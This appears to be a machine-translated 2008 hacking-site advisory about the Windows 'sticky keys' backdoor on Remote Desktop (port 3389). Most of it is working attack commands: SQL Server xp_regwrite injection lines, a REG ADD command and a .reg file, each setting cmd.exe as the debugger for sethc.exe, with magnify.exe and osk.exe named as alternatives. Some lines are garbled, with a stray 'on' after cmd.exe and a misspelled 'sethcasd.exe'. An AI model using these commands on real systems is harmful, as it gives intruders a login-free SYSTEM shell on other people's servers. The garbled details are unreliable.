3 3 8 9 new ideas-vulnerability warning-the black bar safety net

2008-10-29T00:00:00
ID MYHACK58:62200820856
Type myhack58
Reporter 佚名
Modified 2008-10-29T00:00:00

Description

Copyright: BK instant group Author: BK group of a certain beverage

  1. Can modify the registry
  2. Can access 3 3 8 9

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz',";--

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v debugger /t REG_sz /d "c:\windows\system32\cmd.exe" on /f

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethcasd.exe] "debugger"="c:\windows\system32\cmd.exe on"

regedit

/s import . reg file into the registry, quiet mode

/e Export Registry File

Example: regedit /e filename. reg HKEY_LOCAL_MACHINE//SYSTEM

magnify.exe

osk.exe

sethc.exe